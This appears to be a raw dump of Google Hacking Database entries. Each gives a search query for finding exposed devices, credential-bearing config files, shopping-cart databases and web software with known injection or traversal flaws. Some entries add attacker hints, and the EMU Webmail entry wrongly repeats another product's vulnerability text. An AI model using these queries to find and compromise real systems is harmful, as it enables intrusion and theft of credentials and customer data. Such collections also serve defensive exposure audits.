[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3ARICOH+intitle%3A%22Network+Administration%22[url]]
[[dork]intitle:RICOH intitle:"Network Administration"[dork]]
[end][604]]
[[start][605]
[[title]intitle:"lantronix web-manager"[title]]
[[descr]The Lantronix web manager home pages show the print server configuration (Server Name, Boot Code Version, Firmware, Uptime, Hardware Address, IP Address and Subnet Mask). The other setting pages are password protected.
[descr]]
[[url]http://www.google.com/search?q=intitle:%22lantronix+web-manager%22&hl=en&lr=&ie=UTF-8&filter=0[url]]
[[dork]intitle:"lantronix web-manager"[dork]]
[end][605]]
[[start][606]
[[title]Canon ImageReady machines[[title]]
[[descr]The "large" Canon ImageReady machines with model versions 3300, 5000 & 60000.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22remote+ui%3Atop+page%22[url]]
[[dork]intitle:"remote ui:top page"[dork]]
[end][606]]
[[start][607]
[[title]((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))[[title]]
[[descr]ifGraph is a set of perl scripts that were created to fetch data from SNMP agents and feed a RRD file (Round Robin Database) so that graphics can be created later. The graphics and the databases are created using a tool called RRDTool.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%28%28inurl%3Aifgraph+%22Page+generated+at%22%29+OR+%28%22This+page+was+built+using+ifgraph%22%29%29+&btnG=Search[url]]
[[dork]((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph")) [dork]]
[end][607]]
[[start][608]
[[title]ext:cgi intext:"nrg-" " This web page was created on "[title]]
[[descr]NRG is a system for maintaining and visualizing network data and other resource utilization data. It automates the maintenance of RRDtool databases and graph web pages (that look like MRTG web pages.)[descr]]
[[url]http://www.google.com/search?q=ext:cgi+intext:%22nrg-%22+%22+This+web+page+was+created+on+%22&hl=en&lr=&ie=UTF-8&filter=1[url]]
[[dork]ext:cgi intext:"nrg-" " This web page was created on "[dork]]
[end][608]]
[[start][609]
[[title]+":8080" +":3128" +":80" filetype:txt[[title]]
[[descr]With the string [+":8080" +":3128" +":80" filetype:txt] it is possible to find huge lists of proxies... So, I've written a simple shell script that checks these lists and filters out the not responding proxies. It also stores time response in another file, so you can choose only fast proxies. Furthermore it can control the zone of the proxy with a simple whois grep...
The script proxytest.sh is on my website:
http://rawlab.relay.homelinux.net/programmi/proxytest.sh[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%2B%22%3A8080%22+%2B%22%3A3128%22+%2B%22%3A80%22+filetype%3Atxt[url]]
[[dork]+":8080" +":3128" +":80" filetype:txt[dork]]
[end][609]]
[[start][611]
[[title]ReMOSitory module for Mambo[[title]]
[[descr]It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.
Full report: http://www.securityfocus.com/bid/11219
Klouw suggests: inurl:index.php?option=com_remository&Itemid=
Renegade added : ".. to get an administrator login, change the url to http://www.example.com/administrator .. it will pop up an login box...[descr]]
[[url]http://www.google.com/search?q=inurl%3Acom_remository[url]]
[[dork]inurl:com_remository[dork]]
[end][611]]
[[start][614]
[[title]inurl:cgi.asx?StoreID
[[title]]
[[descr]BeyondTV is a web based software product which let you manage your TV station. All you need is to install a TV tuner card on your PC and Connect your TV source (i.e. television antenna) to your TV tuner card. With a installed BeyondTV version you can now administrate your TV with your browser even over the internet.
[descr]]
[[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=inurl%3Acgi.asx%3FStoreID+%0D%0A+%0D%0A&btnG=Google-Suche&meta=[url]]
[[dork]inurl:cgi.asx?StoreID
[dork]]
[end][614]]
[[start][615]
[[title]inurl:hp/device/this.LCDispatcher[[title]]
[[descr]This one gets you on the web interface of some more HP Printers.[descr]]
[[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=inurl%3Ahp%2Fdevice%2Fthis.LCDispatcher+&btnG=Suche&lr=&btnG=Google-Suche&meta=[url]]
[[dork]inurl:hp/device/this.LCDispatcher [dork]]
[end][615]]
[[start][616]
[[title]intitle:"WordPress > * > Login form" inurl:"wp-login.php"[title]]
[[descr]WordPress is a semantic personal publishing platform.. it suffers from a possible XSS attacks.
http://www.securityfocus.com/bid/11268/info/[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22WordPress+%3E+*+%3E+Login+form%22+inurl%3A%22wp-login.php%22+&btnG=Search[url]]
[[dork]intitle:"WordPress > * > Login form" inurl:"wp-login.php" [dork]]
[end][616]]
[[start][617]
[[title]intitle:webeye inurl:login.ml[[title]]
[[descr]This one gets you on the webinterface of Webeye webcams.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3Awebeye+inurl%3Alogin.ml+&btnG=Search[url]]
[[dork]intitle:webeye inurl:login.ml [dork]]
[end][617]]
[[start][618]
[[title]inurl:"comment.php?serendipity"[title]]
[[descr]Serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source.
For an attacker it is possible to inject SQL commands.
http://www.securityfocus.com/bid/11269/discussion/[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3A%22comment.php%3Fserendipity%22&btnG=Search[url]]
[[dork]inurl:"comment.php?serendipity"[dork]]
[end][618]]
[[start][619]
[[title]"Powered by AJ-Fork v.167"[title]]
[[descr]AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to
be backwards-compatible with CuteNews in what areas are sensible.
It is vulnerable for a full path disclosure.
http://www.securityfocus.com/bid/11301[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22Powered+by+AJ-Fork+v.167%22+%0D%0A&btnG=Search[url]]
[[dork]"Powered by AJ-Fork v.167"
[dork]]
[end][619]]
[[start][620]
[[title]"Powered by Megabook *" inurl:guestbook.cgi[[title]]
[[descr]MegaBook is a web-based guestbook that is intended to run on Unix and Linux variants. MegaBook is prone to multiple HTML injection vulnerabilities.
http://www.securityfocus.com/bid/8065[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][620]]
[[start][621]
[[title]intitle:"axis storpoint CD" intitle:"ip address"[title]]
[[descr]Axis' network CD/DVD servers are faster, less costly and easier to manage than using full-blown file servers for networking CD/DVD collections. Any organization that relies heavily on CD/DVD-based information can benefit from an AXIS StorPoint CD+.
[descr]]
[[url]http://www.google.com/search?q=intitle:%22axis+storpoint+CD%22+intitle:%22ip+address%22&hl=en&lr=&ie=UTF-8&filter=0[url]]
[[dork]intitle:"axis storpoint CD" intitle:"ip address"[dork]]
[end][621]]
[[start][622]
[[title]intext:SQLiteManager inurl:main.php[[title]]
[[descr]SQLiteManager is a tool Web multi-language of management of data bases SQLite.
# Management of several data base (Creation, access or upload basic)
# Management of the attached bases of donnèes
# Creation, modification and removal of tables and index.
# Insertion, modification, suppression of recording in these tables [descr]]
[[url]http://www.google.com/search?q=intext%3ASQLiteManager+inurl%3Amain.php&btnG=Search&hl=en&lr=&ie=UTF-8[url]]
[[dork]intext:SQLiteManager inurl:main.php[dork]]
[end][622]]
[[start][623]
[[title]intitle:"oMail-admin Administration - Login" -inurl:omnis.ch[[title]]
[[descr]oMail-webmail is a Webmail solution for mail servers based on qmail and optionally vmailmgr or vpopmail. The mail is read directly from maildirs on the hard disk, which is much quicker than using protocols like POP3 or IMAP. Other features includes multiple language support (English, French, German, Japanese, Chinese, and many more), HTML and pictures inline display, folders, and address book support.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22oMail-admin+Administration+-+Login%22++-inurl%3Aomnis.ch&btnG=Search[url]]
[[dork]intitle:"oMail-admin Administration - Login" -inurl:omnis.ch[dork]]
[end][623]]
[[start][624]
[[title]inurl:"map.asp?" intitle:"WhatsUp Gold"[title]]
[[descr]"WhatsUp Gold's new SNMP Viewer tool enables Area-Wide to easily track variables associated with any port on a network device. With a few simple clicks, a network engineer can select device ports, navigate trees, and graph variables in real time. For instance, Area-Wide can track bandwidth or CPU utilization on a router to aid in capacity and resource management."descr]]
[[url]http://www.google.com/search?q=inurl:%22map.asp%3F%22+intitle:%22WhatsUp+Gold%22&hl=en&lr=&ie=UTF-8&filter=0[url]]
[[dork]inurl:"map.asp?" intitle:"WhatsUp Gold"[dork]]
[end][624]]
[[start][625]
[[title]inurl:" WWWADMIN.PL" intitle:"wwwadmin"[title]]
[[descr]wwwadmin.pl is a script that allows a user with a valid username and password, to delete files and posts from the associated forum.[descr]]
[[url]http://www.google.com/search?q=inurl:%22+WWWADMIN.PL%22+intitle:%22wwwadmin%22&hl=en&lr=&ie=UTF-8&start=0&sa=N[url]]
[[dork]inurl:" WWWADMIN.PL" intitle:"wwwadmin"[dork]]
[end][625]]
[[start][626]
[[title]inurl:odbc.ini ext:ini -cvs[[title]]
[[descr]This search will show the googler ODBC client configuration files which may contain usernames/databases/ipaddresses and whatever.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Aodbc.ini+ext%3Aini+-cvs&btnG=Search[url]]
[[dork]inurl:odbc.ini ext:ini -cvs[dork]]
[end][626]]
[[start][627]
[[title]intitle:"Web Data Administrator - Login"[title]]
[[descr]The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser.
Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Web+Data+Administrator+-+Login%22&hl=en&lr=&ie=UTF-8&filter=0[url]]
[[dork]intitle:"Web Data Administrator - Login"[dork]]
[end][627]]
[[start][628]
[[title]intitle:"Object not found" netware "apache 1.."[title]]
[[descr]This search will show netware apache webservers as the result.
[descr]]
[[url]http://www.google.com/search?q=intitle:%22Object+not+found%22+netware+%22apache+1..%22&hl=en&lr=&filter=0[url]]
[[dork]intitle:"Object not found" netware "apache 1.."[dork]]
[end][628]]
[[start][629]
[[title]intitle:"switch home page" "cisco systems" "Telnet - to"[title]]
[[descr]Most cisco switches are shipped with a web administration interface. If a switch is reachable from the internet and google cashed it this search will show it.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3A%22switch+home+page%22+%22cisco+systems%22+%22Telnet+-+to%22&btnG=Search[url]]
[[dork]intitle:"switch home page" "cisco systems" "Telnet - to"[dork]]
[end][629]]
[[start][630]
[[title]intitle:"DEFAULT_CONFIG - HP"[title]]
[[descr]Searches for the web interface of HP switches.[descr]]
[[url]http://www.google.com/search?q=intitle:%22DEFAULT_CONFIG+-+HP%22&ie=UTF-8&oe=UTF-8[url]]
[[dork]intitle:"DEFAULT_CONFIG - HP"[dork]]
[end][630]]
[[start][631]
[[title]"Powered by yappa-ng"[title]]
[[descr]yappa-ng is a very powerful but easy to install and easy to use online PHP photo gallery for all Operating Systems (Linux/UNIX, Windows, MAC, ...), and all Webservers (Apache, IIS, ...) with no need for a DataBase (no MySQL,...).
yappa-ng is prone to a security vulnerability in the AddOn that shows a random image from any homepage. This issue may let unauthorized users access images from locked albums.
http://www.securityfocus.com/bid/11314[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+yappa-ng%22&hl=en&lr=&filter=0[url]]
[[dork]"Powered by yappa-ng"[dork]]
[end][631]]
[[start][632]
[[title]"Active Webcam Page" inurl:8080[[title]]
[[descr]Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices.
Known bugs: directory traversal and cross site scripting
[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][632]]
[[start][633]
[[title]inurl:changepassword.cgi -cvs[[title]]
[[descr]Allows a user to change his/her password for authentication to the system. Script allows for repeated failed attempts making this script vulnerable to brute force.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Achangepassword.cgi+-cvs&btnG=Search[url]]
[[dork]inurl:changepassword.cgi -cvs[dork]]
[end][633]]
[[start][634]
[[title]filetype:ini inurl:flashFXP.ini[[title]]
[[descr]FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. There are many, many features available in FlashFXP.
The flashFXP.ini file is its configuration file and may contain usernames/passwords and everything else that is needed to use FTP.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][634]]
[[start][635]
[[title]inurl:shopdbtest.asp[[title]]
[[descr]Shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers toview the database location, and since that is usually unprotected, the attacker can then download the web site's database by simly clicking on a URL (that displays the active database).
The page shopdbtest.asp is visible to all the users and contains the full configuration information. An attacker ca therefore download the MDB (Microsoft Database file), and gain access to sensitive information about orders, users, password, ect.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][635]]
[[start][636]
[[title]"Powered by A-CART"[title]]
[[descr] A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database.
A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password).
http://www.securityfocus.com/bid/5597 (search SF for more)[descr]]
[[url]http://www.google.com/search?hl=es&q=%22Powered+by+A-CART%22+&meta=[url]]
[[dork]"Powered by A-CART" [dork]]
[end][636]]
[[start][637]
[[title]"Online Store - Powered by ProductCart"[title]]
[[descr]ProductCart is "an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites". Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code.
http://www.securityfocus.com/bid/8105 (search SF for more)
[descr]]
[[url]http://www.google.com/search?hl=es&q=%22Online+Store+-+Powered+by+ProductCart%22+&meta=[url]]
[[dork]"Online Store - Powered by ProductCart" [dork]]
[end][637]]
[[start][638]
[[title]"More Info about MetaCart Free"[title]]
[[descr]MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) allows attackers to access the database used for storing user provided data (Credit cart numbers, Names, Surnames, Addresses, E-mails, etc).
[descr]]
[[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=%22More+Info+about+MetaCart+Free%22&btnG=Suche&meta=[url]]
[[dork]"More Info about MetaCart Free"[dork]]
[end][638]]
[[start][639]
[[title]inurl:midicart.mdb[[title]]
[[descr]MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, phone number, credit card number, and company name).[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Amidicart.mdb&btnG=Google-Suche&meta=[url]]
[[dork]inurl:midicart.mdb[dork]]
[end][639]]
[[start][640]
[[title]camera linksys inurl:main.cgi[[title]]
[[descr]Another webcam, Linksys style.[descr]]
[[url]http://www.google.com/search?q=camera+linksys+inurl%3Amain.cgi&start=0&start=0&ie=utf-8&oe=utf-8[url]]
[[dork]camera linksys inurl:main.cgi[dork]]
[end][640]]
[[start][641]
[[title]intitle:"MailMan Login"[title]]
[[descr]MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation.
MailMan is written as a Perl CGI script, the version that is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user that is in most cases 'nobody'.
[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22MailMan+Login%22+++&btnG=Suche&meta=[url]]
[[dork]intitle:"MailMan Login" [dork]]
[end][641]]
[[start][642]
[[title]intitle:"my webcamXP server!" inurl:":8080"[title]]
[[descr]"my webcamXP server!"
Is there really an explantation needed?
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22my+webcamXP+server%21%22+inurl%3A%22%3A8080%22&btnG=Search[url]]
[[dork]intitle:"my webcamXP server!" inurl:":8080"[dork]]
[end][642]]
[[start][643]
[[title](inurl:webArch/mainFrame.cgi ) | (intitle:"web image monitor" -htm -solutions)[[title]]
[[descr]The Ricoh Aficio 2035 (fax/scanner) web interface.
Attackers may read faxes and can get information like internal ip addresses.
cleanup by: yeseins & golfo
cleanup date: Apr 28, 2005
original dork: inurl:webArch/mainFrame.cgi
[descr]]
[[url]http://www.google.com/search?num=20&q=%28inurl%3AwebArch%2FmainFrame.cgi+%29+%7C+%28intitle%3A%22web+image+monitor%22+-htm+-solutions%29[url]]
[[dork](inurl:webArch/mainFrame.cgi ) | (intitle:"web image monitor" -htm -solutions)[dork]]
[end][643]]
[[start][644]
[[title]"Powered by FUDforum"[title]]
[[descr]FUDforum is a forums package. It uses a combination of PHP & MySQL to create a portable solution that can run on virtually any operating system.
FUDforum has two security holes that allow people to download or manipulate files and directories outside of FUDforum's directories. One of the holes can be exploited by everyone, while the other requires administrator access. The program also has some SQL Injection problems.
http://www.securityfocus.com/bid/5501[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+FUDforum%22+&btnG=B%C3%BAsqueda&meta=[url]]
[[dork]"Powered by FUDforum" [dork]]
[end][644]]
[[start][645]
[[title]"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"[title]]
[[descr]"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users."
There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection.
[descr]]
[[url]http://www.google.com/search?hl=en&q=%22BosDates+Calendar+System+%22+%22powered+by+BosDates+v3.2+by+BosDev%22&btnG=B%C3%BAsqueda&meta=[url]]
[[dork]"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"[dork]]
[end][645]]
[[start][646]
[[title]intitle:"Lotus Domino Go Webserver:" "Tuning your webserver" -site:ibm.com
[[title]]
[[descr]Domino Go Webserver is a scalable high-performance Web server that runs on a broad range of platforms. Domino Go Webserver brings you state-of-the-art security, site indexing capabilities, and advanced server statistics reporting.
With Domino Go Webserver, you can speed beyond your competition by exploiting the latest advances in technology, such as Java, HTTP 1.1, and Web site content rating. Get all this and more in a Web server that's easy to install and maintain.
--From the Lotus Domino Go Webserver web pag
[descr]]
[[url]http://www.google.com/search?q=intitle:%22Lotus+Domino+Go+Webserver:%22+%22Tuning+your+webserver%22+-site:ibm.com&hl=en&lr=&ie=UTF-8&filter=0[url]]
[[dork]intitle:"Lotus Domino Go Webserver:" "Tuning your webserver" -site:ibm.com[dork]]
[end][646]]
[[start][647]
[[title]intitle:"IBM HTTP Server" "Use the Administration Server to configure"[title]]
[[descr]Vendors page:
The foundation of any e-business application is the Web server. New IBM e-business software, such as the WebSphere family of products, is designed to operate with many popular Web servers. You do not need to change Web servers to take advantage of the latest IBM Web application technology.
IBM HTTP Server features include:
-Easy installation
-Support for SSL secure connections
-Fast Response Cache Accelerator
-IBM support as part of the WebSphere bundle
-Hardware crypto support
-Administration Server that helps to administer and configure IHS servers.
-Help information that uses the easy-to-navigate design that is common to all WebSphere products
-IBM HTTP Server runs on AIX, HP-UX, Linux, Solaris, Windows 2000 and Windows NT[descr]]
[[url]http://www.google.com/search?q=intitle:%22IBM+HTTP+Server%22+%22Use+the+Administration+Server+to+configure%22&hl=en&lr=&ie=UTF-8&filter=0[url]]
[[dork]intitle:"IBM HTTP Server" "Use the Administration Server to configure"[dork]]
[end][647]]
[[start][648]
[[title]"Powered by Caudium Webserver" -caudium.net[[title]]
[[descr]What is the Caudium WebServer?
Caudium is the name of a GPL-ed (free for commercial and personal use) web server written in Pike and in C. It is originally based on the Roxen Challenger 1.3 code base.
It is an attractive alternative to servers like Apache, Netscape® and Zeus® due to its strength in dynamic page and data generation, modularity and more.
The Caudium Project runs also an IRC network, has created a GPL webmail called CAMAS and has an ever-growing community of developers and users worldwide.
What are Caudium's Benefits?
Performance: Caudium is a non-forking monolithic web server. Most web servers, like Apache 1.3, fork processes to keep up with demand, creating a less scalable solution when a sudden burst of traffic hits your web site.
An optional multi-threaded mode further increases performance especially when dealing with dynamically generated pages.
[..]
Flexibility: You can write new tags and modules, easily extend Caudium using Pike or C and take advantage of the configuration interface.
Dynamic content can be generated with RXML, PHP or CGIs thus migration from other servers like Apache is very easy.
Platform independance: Caudium is shipped with Debian GNU/Linux and FreeBSD ports and runs on many other Unix-like systems (Any Linux®-based, OpenBSD, NetBSD, Solaris®, AIX®, Darwin/MacOS X®)
It is written in Pike and C.
[..]
[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+Caudium+Webserver%22+-caudium.net&meta=[url]]
[[dork]"Powered by Caudium Webserver" -caudium.net[dork]]
[end][648]]
[[start][649]
[[title]intitle:"Directory Listing, Index of /*/"[title]]
[[descr]Vendor page:
"Einfache HTTP-Server-Software für privates Homepage-Hosting oder große Uploads."
small HTTP server software for private hompage hosting or big uploads.
[descr]]
[[url]http://www.google.com/search?q=intitle:%22Directory+Listing,+Index+of+/*/%22&hl=en&lr=&filter=0[url]]
[[dork]intitle:"Directory Listing, Index of /*/"[dork]]
[end][649]]
[[start][650]
[[title]intitle:"error 404" "From RFC 2068 "[title]]
[[descr]WebLogic Server Process Edition extends the functionality of the Application Server by converging custom app development with powerful Business Process Management (BPM) capabilities to provide an industrial strength, standards-based framework that enables the rapidly assembly of composite services, transforming existing infrastructure to a service oriented architecture-in a manageable phased approach.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22error+404%22+%22From+RFC+2068+%22&btnG=Search[url]]
[[dork]intitle:"error 404" "From RFC 2068 "[dork]]
[end][650]]
[[start][651]
[[title]intitle:"Open WebMail" "Open WebMail version (2.20|2.21|2.30) "[title]]
[[descr] "Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail". A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl.
Details
Vulnerable Systems:
* Open Webmail versions 2.20, 2.21 and 2.30
* Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below)
The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a ";", "|" or "( )" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, "nobody" or "www", e.g.).
[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22Open+WebMail%22+%22Open+WebMail+version+%282.20%7C2.21%7C2.30%29+%22&btnG=B%C3%BAsqueda&meta=[url]]
[[dork]intitle:"Open WebMail" "Open WebMail version (2.20|2.21|2.30) "[dork]]
[end][651]]
[[start][652]
[[title]intitle:"EMUMAIL - Login" "Powered by EMU Webmail"[title]]
[[descr]The failure to strip script tags in emumail.cgi allows for XSS type of attack.
Vulnerable systems:
* EMU Webmail version 5.0
* EMU Webmail version 5.1.0
Depending on what functions you throw in there, you get certain contents of the emumail.cgi file.
The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter.
http://www.securityfocus.com/bid/9861[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3A%22EMUMAIL+-+Login%22+%22Powered+by+EMU+Webmail%22+++&btnG=Search[url]]
[[dork]intitle:"EMUMAIL - Login" "Powered by EMU Webmail" [dork]]
[end][652]]
[[start][653]
[[title]intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse[[title]]
[[descr]WebJeff-Filemanager 1.x
DESCRIPTION:
A directory traversal vulnerability has been identified in WebJeff-Filemanager allowing malicious people to view the contents of arbitrary files.
The problem is that the "index.php3" file doesn't verify the path to the requested file. Access to files can be done without authorisation.
http://www.securityfocus.com/bid/7995[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22WebJeff+-+FileManager%22+intext%3A%22login%22+intext%3APass%7CPAsse&btnG=Search[url]]
[[dork]intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse[dork]]
[end][653]]
[[start][654]
[[title]inurl:netw_tcp.shtml[[title]]
[[descr]An Axis Network Camera captures and transmits live images directly over an IP network (e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera from a Web browser on any
computer [..]
[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Anetw_tcp.shtml&btnG=B%C3%BAsqueda&meta=[url]]
[[dork]inurl:netw_tcp.shtml[dork]]
[end][654]]
[[start][655]
[[title]intitle:"Object not found!" intext:"Apache/2.0.* (Linux/SuSE)"[title]]
[[descr]This one detects apache werbservers (2.0.X/SuSE) with its error page.
[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22Object+not+found%21%22+intext%3A%22Apache%2F2.0.*+%28Linux%2FSuSE%29%22&btnG=B%FAsqueda&meta=[url]]
[[dork]intitle:"Object not found!" intext:"Apache/2.0.* (Linux/SuSE)"[dork]]
[end][655]]
[[start][656]
[[title]inurl:"messageboard/Forum.asp?"[title]]
[[descr]Multiple vulnerabilities have been found in GoSmart Message Board. A remote user can conduct SQL injection attack and Cross site scripting attack.
http://www.securityfocus.com/bid/11361[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=inurl%3A%22messageboard%2FForum.asp%3F%22&btnG=Search[url]]
[[dork]inurl:"messageboard/Forum.asp?"[dork]]
[end][656]]
[[start][657]
[[title]intitle:"Directory Listing" "tree view"[title]]
[[descr]Dirlist is an ASP script that list folders in an explorer style:
* Tree
* Detailed
* Tiled
Quote:
*Lists files and directories in either a Tree, Detailed, or Tiled view.
*Can set a "Starting Directory". This can be a IIS Virtual Directory path.
*Displays file and directory properties.
*Can specify directories which you do not want to display and access.
*Can specify directories which you only want to display and access.
*Can specify what file-types to only display.
*Displays custom file-type icons. This can be turned off in the settings.
* 'Detailed' and 'Tiled' views display a Breadcrumb bar for easier navigation. This can be turned off in the settings.
[descr]]
[[url]http://www.google.com/search?q=intitle:%22Directory+Listing%22+%22tree+view%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0[url]]
[[dork]intitle:"Directory Listing" "tree view"[dork]]
[end][657]]
[[start][658]
[[title]inurl:default.asp intitle:"WebCommander"[title]]
[[descr]Polycom WebCommander gives you control over all aspects of setting up conferences on Polycom MGC MCUs. With Polycom WebCommander, scheduling and launching multipoint conferences, ad hoc meetings or future conferences is an easy, productive way to schedule meetings.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Adefault.asp+intitle%3A%22WebCommander%22+&btnG=Search[url]]
[[dork]inurl:default.asp intitle:"WebCommander" [dork]]
[end][658]]
[[start][659]
[[title]intitle:"Philex 0.2*" -script -site:freelists.org[[title]]
[[descr]Philex (phile 'file' explorer) is a web content manager based php
what philex can do ?
- easy navigation with tree structure
- create, delete, rename, copy and move folders/files.
- download files (normal or compressed :zip, gz, bz ).
- download many files as one compressed file.
- send files by email.
- upload local files to server [descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22Philex+0.2*%22+-script+-site%3Afreelists.org&btnG=Search[url]]
[[dork]intitle:"Philex 0.2*" -script -site:freelists.org[dork]]
[end][659]]
[[start][660]
[[title]intitle:mywebftp "Please enter your password"[title]]
[[descr]MyWebFTP Free is a free lite version of MyWebFTP Personal - a PHP script providing FTP client capabilities with the user interface in your browser. Install it on a remote server and easily connect to your FTP servers through a firewall or a proxy not allowing FTP connections. No PHP built-in FTP support is required. Perform actions on many files at once. Password protected from casual surfers wasting your bandwidth. Nice look and feel is easy customizable.
[descr]]
[[url]http://www.google.com/search?q=intitle:mywebftp+%22Please+enter+your+password%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0[url]]
[[dork]intitle:mywebftp "Please enter your password"[dork]]
[end][660]]
[[start][661]
[[title]"1999-2004 FuseTalk Inc" -site:fusetalk.com[[title]]
[[descr]Fusetalk forums (v4) are susceptible to cross site scripting attacks that can be exploited by passing a img src with malicious javascript. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=%221999-2004+FuseTalk+Inc%22+-site%3Afusetalk.com&btnG=Search[url]]
[[dork]"1999-2004 FuseTalk Inc" -site:fusetalk.com[dork]]
[end][661]]
[[start][662]
[[title]"2003 DUware All Rights Reserved"[title]]
[[descr] Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account.
DUclassmate may allow unauthorized remote attackers to gain access to a computer.
DUclassified is reported prone to multiple SQL injection vulnerabilities.
SQL injection issues also affect DUforum.
DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities.[descr]]
[[url]http://www.google.com/search?q=%222003+DUware+All+Rights+Reserved%22&hl=en&lr=&filter=0[url]]
[[dork]"2003 DUware All Rights Reserved"[dork]]
[end][662]]
[[start][663]
[[title]"WebExplorer Server - Login" "Welcome to WebExplorer Server"[title]]
